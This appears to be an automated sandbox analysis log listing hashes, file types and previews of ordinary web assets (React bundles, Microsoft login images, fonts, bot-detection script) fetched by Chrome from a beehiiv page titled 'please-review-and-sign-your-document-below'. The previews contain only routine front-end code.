                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3282)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3658
                                                                                                                                            Entropy (8bit):5.351160382921681
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkE40N1yefwIeLFffomxG3hEoYs/E83/FugOxZ6hNDkzU04ZkTqhPSseXvGDA1:QwWcfQmxET/7Oj6nQzUX7hP6us1
                                                                                                                                            MD5:A8750C2581F92DA1A2942DCC484F8CC8
                                                                                                                                            SHA1:73B741806284B2B9D3C3EEE16E73143C6D62767E
                                                                                                                                            SHA-256:3A6BC484BE7C5CF26CF52D8C0D88D6491D5FDEDD021CA4F0A462FAA2B9CF3EC7
                                                                                                                                            SHA-512:FCF23756F5E9BC529F0E431421DE12C02800735AA54CE506DADFA21986014532EA82370B7253FBC6947DA20725F1012FC836EE05AFE143DD3C7469D959349444
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/LoginWithPasswordAction-TVLpJaLq.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2e002f94-b985-51d6-b6a7-9c021b173779")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{r as f}from"./index-D6da9p6-.js";import{T as a}from"./index-BdpAPpdN.js";import{u as h}from"./useIsLoggedIn-BbU3-q43.js";import{u as j}from"./useToast-DK42uF07.js";import{B as b}from"./index-EzvqLY92.js";import{I as u}from"./Input-snMSpc3o.js";import{S as _}from"./StatusInputs-JkVhk_jg.js";import{u as x}from"./useTranslation-CfKJAmGY.js";import{R as y}from"./RedirectToHiddenInput-mUb4yii7.js";import{c as w,L as N}from"./components-Oj2xMfGE.js";const p=({emailFieldName:n="email",emailFieldType:i="email",isSubmitting:r=!1})=>{const[l,c]=f.useState(!0),{t:s}=x(),t=e.jsx("button",{type:"button",onClick:()=>c(!l),children:e.jsx(a,{as:"span",size:"xs",type:"body",weight:"bold",the
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (500)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):868
                                                                                                                                            Entropy (8bit):5.480803011445892
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSLuR1ONuDCT7/ZQXfdpBeRluR1v:JWkE3uyNuDCTeXrBIluj
                                                                                                                                            MD5:7BA41B2464D6B104C13BC76CBD2B2745
                                                                                                                                            SHA1:D276E8D91A54464A9FBB0F831C8B245E40D3DA3A
                                                                                                                                            SHA-256:75B89DFE7FA07FDCE28C642398F9B9FDA667C6AA6EF0A4F72DB9A2B61B6B2DF2
                                                                                                                                            SHA-512:BD65A734093F2ACAF4E5ABC65F093C767918CDC0952096E8314E9275B3CF9902CC8A3B709B6EB8B17D380DA96DB97D3617AC37B2D8E1FFF1252A2857EC606171
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51343ced-e1d9-5356-bd0e-6589a5b05c5a")}catch(e){}}();.import{r as c}from"./index-D6da9p6-.js";import{o as d}from"./use-is-mounted-BaHv16bB.js";import{l as m}from"./keyboard-CaEu2o0u.js";function b({container:e,accept:r,walk:t,enabled:f=!0}){let o=c.useRef(r),n=c.useRef(t);c.useEffect(()=>{o.current=r,n.current=t},[r,t]),m(()=>{if(!e||!f)return;let u=d(e);if(!u)return;let a=o.current,l=n.current,p=Object.assign(s=>a(s),{acceptNode:a}),i=u.createTreeWalker(e,NodeFilter.SHOW_ELEMENT,p,!1);for(;i.nextNode();)l(i.currentNode)},[e,f,o,n])}export{b as F};.//# sourceMappingURL=use-tree-walker-Inv4mdsP.js.map..//# debugId=51343ced-e1d9-5356-bd0e-6589a5b05c5a.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 35682
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9516
                                                                                                                                            Entropy (8bit):7.968253590340941
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:qzUDtqN6wWTHCmT2c4O1EnKsR+tLL+FJwoaTZKSXe+II6XKaooKS7MNoMw:JlwWTimTK1FUtLg2T8/pAor
                                                                                                                                            MD5:8D2B7A9BD4FC7D30AFA511831AD75DDB
                                                                                                                                            SHA1:5C78ECA2F5EA3ACABB4A2462D542159821185850
                                                                                                                                            SHA-256:18B00E2705AA354CCC732FDBD65794F6D79743FAFA771FBD0AF48F4375078BC0
                                                                                                                                            SHA-512:1B588491751B6F2E0B87C13D78294FBCFCAABAF2E715C715CEB2B6BB88DBBA35E7EAF7DD2A0F4EC6DBB358EA8FC21ADBA8F954AA9DF8BADC2DD994C4C5095908
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcredentialpicker_2002f7276bc18e3ecf90.js
                                                                                                                                            Preview:...........}.s.6....W.;.tB+..TV'.:N.m...N..6....6k........~..R.H.r....i-.....@.....E./m..............k...O.........I....8.x.4..i...&Z.iq..l.f...v.....(K/..\h.,.]."..q^@.P..km..e\;.Yq.}<..a|...gq..Y......E.F..G..C..m.p.i..1;.~.Y..iTh.`"..I.%....5..-....Yq^.1.N...5..3.9...s.0..._@0N......>i2..7...Cx.0hE..K....89.n.....W...|.q..\dW..|...<.$.r.].... ..hg.M...t.8z..q).B....5......"1.5...b!..[9.u..q%...{.&...\...q..g. ...(.....8_.c.^....lNs..].r...O.>.....~*i5..!@..O/i.Ts.7...E...G@....tC.......T....^...i............_......|...o..C.I.L.b5.z.'..+..6M..HO.....|..N.....>.c!......|.#}.=.z...H...j.....KldB...x....v.`..t|Rd ..%|=.4{O.._L..1E..y:).....2.A.@.Oo.B...w.Xv;H....(y....G......k..i4~7........E..9.f...|!2.xz.....X.....@K...`Z.7.w..o*.j....`1Ey...T.........4...>G..WP,.b.#..?C.2......\..5q....1I.....#..4.......p^...l.1.../...j.$...d...,Y..w.|^d.O.....v..<...n._.l....Q"N.K!..=.8(...a.....C.......Oqr..............x...X.o9.<.Jx.+>. .4.......O.1.n..Y..Y..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (490)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):856
                                                                                                                                            Entropy (8bit):5.479713299845736
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSmJsEN2f6nXkVn71oi7IyhntbCLKJsF:JWkEgZNAsXkVn71fnRI48
                                                                                                                                            MD5:CB9D47ADDD2FE68A1507010A85344056
                                                                                                                                            SHA1:5CEDD458C9387C2DCD45EA599FAE79BE47976382
                                                                                                                                            SHA-256:F464D8B1F4571DBB24387884D470DB3FC615829AD1BDC77919A837B9E70474FD
                                                                                                                                            SHA-512:D38CE1973256A333DB66800B3F47896207615F6B048F80C9E35FFE9385282287505F69BA51D5D9B1DEE7AF5708899D0617F5EAF2D6E91BA69D5F9FBF6C5335BD
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/ArrowLeftIcon-Dz9QYxn0.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="45f8a0fe-5f08-519a-bd11-79d091244824")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function a({title:r,titleId:t,...o},n){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M10.5 19.5 3 12m0 0 7.5-7.5M3 12h18"}))}const i=e.forwardRef(a);export{i as F};.//# sourceMappingURL=ArrowLeftIcon-Dz9QYxn0.js.map..//# debugId=45f8a0fe-5f08-519a-bd11-79d091244824.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (15680)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):16040
                                                                                                                                            Entropy (8bit):5.61545851955969
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:+m5xBZ8ZJnVv6+WKZafxf8uPlxW7pVuulAYNYkPzSR:+m57Z8ZlcFf8UlxW77lAYN7zG
                                                                                                                                            MD5:4AB9D5F15C0C68BA0ADB57CF084D1494
                                                                                                                                            SHA1:BE7241EEB4D0BBDAAC3ADBFDBEF26AF7C6BDA6BA
                                                                                                                                            SHA-256:AB64D394D8DE8AFACADC6150195AA6C65825E0C26093A88F19D1F3B309335AE2
                                                                                                                                            SHA-512:81BDDF33975FDD20599207F5E7FA7B440DBA02A43693114D42B00F6AE8C5B7AE1E08085B99CD40DAA61F502C3D285950223C82535279F4E83CD328578F1EFAB3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/popover-CV1J-FFp.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="48665b6f-ad4d-52b5-906d-5247e5a6261e")}catch(e){}}();.import{j as b}from"./jsx-runtime-BjG_zV1W.js";import{c as le}from"./index-x2da_zcv.js";import{T as Pe,L as he,Y as ge,a as Se,F as ye,I as xe}from"./YoutubeIcon-DSouMQiN.js";import{r as a,e as $}from"./index-D6da9p6-.js";import{e as Ie,N as we,E as Ee,n as fe,y as $e,s as D}from"./use-root-containers-DmyWFwuo.js";import{O as X,U as Y,y as U,c as Te,s as de,o as I,u as H,C as q,I as z,a as A,T as ke,d as Ne,l as Me}from"./keyboard-CaEu2o0u.js";import{n as ae,y as Le,s as je,d as W,u as ve}from"./transition-y-5XFFuu.js";import{f as re,s as ne}from"./hidden-KuoXmiN5.js";import{r as me}from"./bugs-DVQzBh-s.js";import{f as ue,h as Fe,T as _e,O as G,M as R,o as Oe,N as oe}from"./use-is-mounted-BaHv16bB.js";const Be=({className:e,fil
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3027)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3385
                                                                                                                                            Entropy (8bit):5.373762987112694
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEVN1SnXxitgZdbedxxSvlg3K0wRObiY6uaNXFKdCSA/dHtUd7570waRp1a6zx:QdSkgZ5e9Sd5ROOcaNXSo/dH81Sk0
                                                                                                                                            MD5:D9FC76228771CED44350EE8223CF8A78
                                                                                                                                            SHA1:E922D9199ACC2339C7B8C3F6ABA527B6209C3FB2
                                                                                                                                            SHA-256:1D91233A394023BEFBEE7FCDA06592FCA2E2F70EE929802F0BE76EB0435F6821
                                                                                                                                            SHA-512:43D999CF3E4F0E8D9893D14DC789F38367B5B3D97217F98908A81FC15654EDC1C4A3530F6F55B15488702B593C4C97AD92BE6E9E6D0F7C4D764331C8EDF88922
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-D5Hq4kiz.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="18ae0835-3e40-5dd2-815b-3c111c4bd39c")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{c as s}from"./index-x2da_zcv.js";import{d as u}from"./dayjs.min-B8CfgAhU.js";import{r as _}from"./relativeTime-tlGPeD3Q.js";import{I as j}from"./Image-ycA_AFLr.js";import{T as m}from"./index-BdpAPpdN.js";import{u as v}from"./useTranslation-CfKJAmGY.js";import{L as y}from"./components-Oj2xMfGE.js";import{F as N}from"./SparklesIcon-DA4hsc2a.js";import{F as z}from"./LockClosedIcon-BluoCUMI.js";const c=({theme:t,text:r,icon:n})=>e.jsxs("div",{className:"relative mb-1 mt-1 inline-flex items-center space-x-1 overflow-hidden rounded-wt px-2 py-1 text-xs",children:[e.jsx("div",{className:s("absolute inset-0",t==="light"?"bg-wt-primary text-wt-primary opacity-10":"",t==="dark"?"bg-wt
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (510)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):868
                                                                                                                                            Entropy (8bit):5.511541539450466
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSuuNCaDA9X2qKvbR3BHHNMi6sqP:JWkEjN1DA9X2Xvb736F
                                                                                                                                            MD5:B2B166EFE10F98FBFFDAF49CC2815ACE
                                                                                                                                            SHA1:257BBBB5003056F437185891865F275797748597
                                                                                                                                            SHA-256:CEA70605C7B965CB1CDDAF71C70040D4E914219C57587BB6E9E06079B51F95E0
                                                                                                                                            SHA-512:E9B9D55F086BFA0908488D3226FCE1318F5A9CB43BDD616C88FA2A46693638F3664B858D70432E6447B7ECA30F72E774BCA050B1DCE4B882088DF3635D8BB990
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5707660c-17e2-5dcd-8bda-553c824ef04b")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{$ as l,a as o}from"./index-COqk5b7U.js";import{c as t}from"./index-x2da_zcv.js";const m=({currentProgress:r=60,variant:a="post"})=>{const s=a==="reward"?"border border-gray-200 relative overflow-hidden rounded-full w-full h-4":"relative overflow-hidden h-1.5 bg-transparent w-full";return e.jsx(l,{className:s,value:r,children:e.jsx(o,{className:t("h-full w-full bg-wt-primary",a==="signup-flow"&&"transition-all"),style:{width:`${r}%`}})})};export{m as P};.//# sourceMappingURL=index-pnFxOaac.js.map..//# debugId=5707660c-17e2-5dcd-8bda-553c824ef04b.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65402)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):171550
                                                                                                                                            Entropy (8bit):5.675906166252663
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:uoPRtO/tMnX3kOsI2zIJH49Nee7jlz7aBobMhTsjYZfMtTm4vFGSN:uoe+nX3kg2UJH4EsEYjYZEt6sV
                                                                                                                                            MD5:863047C2A9C5ED34D8B2933868EE0279
                                                                                                                                            SHA1:60AF5093AB9C50BE20A1115D1D526F93CA0DBA3B
                                                                                                                                            SHA-256:24CEB753E5BE0F764C669259E05093833BFB80184A501140B026926AEED5D9CF
                                                                                                                                            SHA-512:4D82F6CD44BCCE4FC099C307598A91AF44333847EF2B758183981ED2718FFC00FB97FE1D7202C0DB1C6A22E7FF82E37EE64D5C20B29FBEA6447BA1439469F142
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:// @license Copyright (C) 2014-2025 PerimeterX, Inc (www.perimeterx.com). Content of this file can not be copied and/or distributed..try{window._pxAppId="PXeBumDLwe",function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function n(t,n){if(t){if("string"==typeof t)return e(t,n);var r=Object.prototype.toString.call(t).slice(8,-1);return"Object"===r&&t.constructor&&(r=t.constructor.name),"Map"===r||"Set"===r?Array.from(t):"Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r)?e(t,n):void 0}}function r(t){return function(t){if(Array.isArray(t))return e(t)}(t)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 981
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):542
                                                                                                                                            Entropy (8bit):7.5641293776931215
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:XViE9k3lgyMHbJRUWzRrXeQXz1xmC4+MFsb+/:XViE9kVgpJzooe+MFG+/
                                                                                                                                            MD5:7569D6C5B45AB123E5B8150BB2B3BF22
                                                                                                                                            SHA1:3BE25A250F736FF3B3D809466659E3422C0A3B1B
                                                                                                                                            SHA-256:AA5FEBD7CE526B29249A3D558B4D0CE0021BB4338EE729AD6377A6BE2DABCA3E
                                                                                                                                            SHA-512:CF6721B1B8647705FEF5D18B6A3B0CF7474C3E8667F14C1A013782DD3B21EBB08F6E32052A34B8554FCAA9FC83AF4748EE29ED078AE98154DD047B979A350BD2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/credentialoptions/cred_option_github_fa3dbea07d478da8facde73b44f90b02.svg
                                                                                                                                            Preview:..........uS..0.....J0x|w.....@.(q.*......;.ZU.....3W.j._...0.5....P........Z..yI..$......K...r.....f.....[.....u....x....:..r.._.....5...d..pM.f.2.|s9?..p.iP.sRi.-(.V.V...2..t.i.....`.$.X H...!(...W..[.. .<aJ*@..#.i....h.Z....!'2;Rm..0.`..W.FF..O.......'&....B.oi..:....T...'..j$p..Oo'bc.,......8z$...E...N..X......F..E.b+Hnb*B.k...<.3?O..'...<a....R..G.....8%...%q.,M.S...TT...|....F.D.(.RS.F)PF..t...C.w.].a...th.m1...f....|f.*.9%....C86...*..C.....,.4...}..0....s3..i..l.C......li.!..W......9\..&.x.......u....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (370)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1001
                                                                                                                                            Entropy (8bit):5.493947223436579
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuS+lViOgNQtcd7uoqIfyAxSKY41MI0TdRB1waAVic:JWkECi5NraAfbxYCMzDPwic
                                                                                                                                            MD5:53D7C93E82FE6FE31FCC39AA759E13D1
                                                                                                                                            SHA1:C94371B2F5769C4849005AF96979CFAC26BFFC5C
                                                                                                                                            SHA-256:E19ECD46EC0A147D8C2DEA13C75424B35FE2009343445F9E239437AFAF91DD43
                                                                                                                                            SHA-512:63A28DFD8F19BFD9B79830725665E3A5E9191DC1E4A0C6917705F569488DF91E3C018541330A7DD95366A54F22CA393B76C26673A4CCC1C9E9C62187AD43B25D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/jsx-runtime-BjG_zV1W.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c358fce4-4230-581e-852b-70b869a996bf")}catch(e){}}();.var o={exports:{}},s={};/**. * @license React. * react-jsx-runtime.production.js. *. * Copyright (c) Meta Platforms, Inc. and affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var E=Symbol.for("react.transitional.element"),n=Symbol.for("react.fragment");function l(v,r,t){var e=null;if(t!==void 0&&(e=""+t),r.key!==void 0&&(e=""+r.key),"key"in r){t={};for(var x in r)x!=="key"&&(t[x]=r[x])}else t=r;return r=t.ref,{$$typeof:E,type:v,key:e,ref:r!==void 0?r:null,props:t}}s.Fragment=n;s.jsx=l;s.jsxs=l;o.exports=s;var u=o.exports;export{u as j};.//# sourceMappingURL=jsx-runtime-BjG_zV1W.js.map..//# debugId=c358fce4-4230-581e-852b-70b869a996bf
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):673
                                                                                                                                            Entropy (8bit):7.6596900876595075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://logincdn.msauth.net/shared/5/images/2_bc3d32a696895f78c19d.svg
                                                                                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6
                                                                                                                                            Entropy (8bit):2.584962500721156
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:fCu:au
                                                                                                                                            MD5:AAAB7A355103063D9EEB4824A3A6B374
                                                                                                                                            SHA1:E51555F02C32321F3E48F07A0FA5AF46DF835BFC
                                                                                                                                            SHA-256:79BA862622D6FA84AC7E4F98EB95043A255FC2C81711E9400A8AA4D4B1608471
                                                                                                                                            SHA-512:D1A0C9C4F628459F5CA904405B2A66A69425A50E8DCE1BAA43161D784EB219BD3E1FD9447BCBACC314652EDA08CF0B02C863C87F3AC1534AE0F62A414C191F1B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:dfp:OK
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 23692, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):23692
                                                                                                                                            Entropy (8bit):7.991897162752029
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:384:rfabeuzsqm+MAlOitodpHq9WS5TO+cig4RKuIc7OhiVaCcHKLgFT1GS:rfEeuzM+MFSoHqgS5TOjr+QTUVPuSQ5X
                                                                                                                                            MD5:F837D382A885A07C34A3D4BF4F49373D
                                                                                                                                            SHA1:68DDCEEF1D164A48D9D01D4A74F26B7897323229
                                                                                                                                            SHA-256:DD05E326CF8EAC3B55ACECF29C842ED73E6E6DD06491CF47F7E8800680AB3E33
                                                                                                                                            SHA-512:EF010D89971C4F69AF7BF541430364C56245A5B63ED730FE628E49F48FA9E201C7F42B1E104EB14C3193BF79DD7CE20244F6B963E9996EB8308C0D61F444ECE6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZ9hiA.woff2
                                                                                                                                            Preview:wOF2......\...........\)..........................P......p.`?STAT^..>........>.....6.$.... ..\........Ghv_.v@oV.v.......AZXzn..i=.:.a.....'...?'..a......=....Nl.....j..6N^Y....u..3ot#.....W..w.h.^.&*."......%._...NA...3......3.-o...=t...x..}.A.lH....r...]i........g...b.M..`.%.$N...,.<..Z.....\a...Ih...os...].vW...!..:...S]...'"3..>...g.F...=.........-.O..dO...)KL....6.A.......I2.-...cd.[F...eh.m...~.T..s....*... ..L..c.*`cc........(b.H.. #.@lB1.;.R.....S..y...Xb..Em...%....m...P.C..p..RP.....*%.!D.)....d....pM.PG$.#t..x...Z~.x/.?................].L.Z~c.'.#.yq.h...`E....<.;1G;D...o.NQt...k=+..V..Z..J.$........1.+G.J.H..v.NR........}......z6...h\...z.bC.-..?u......O......4....w...P.I..U...A....['........s.O.:..>1..-M#......a.9..d0P5@.n!$.%.&.m..3..0./....T+..).R:.s...<......?..1.....X...q.D.....hNE.S....@w.Z@.....d.G.....d6.>.?.......3w...i..........{[....d...D.Y.'._.....n....:.:.Lu@.(.C;ys...@S/D.;...^ .7B..gTa..m...,d...H...S.!..=..).\..k..j ...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):47070
                                                                                                                                            Entropy (8bit):5.5229130567822455
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:o86Q6Um7YYhQuRmzVP686Q6XtYe86Q6XtYh:oxlxlA6xlzxlQ
                                                                                                                                            MD5:34E515798B0FA98D87A97BA1EC0B9B81
                                                                                                                                            SHA1:62A6649F533780CE79834C56EA228DC7C7191007
                                                                                                                                            SHA-256:D8A3624A540A9F4432547812F1F418926714EA0E8DB981C24DA73955005FFFE3
                                                                                                                                            SHA-512:2F32D8D8C713FC63897DA8AA23E205F3C5C50F674B32C7227DCF961A0995C6F2AB9BA6C9FFC68E1D1FF0DC343ADFD1C990871C5C82E7842C2910B2D9CA68E658
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below?_data=routes%2Fp%2F%24slug
